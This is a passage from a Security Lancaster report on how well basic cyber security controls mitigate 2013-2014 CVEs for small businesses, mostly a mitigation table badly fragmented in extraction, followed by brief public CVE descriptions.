chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
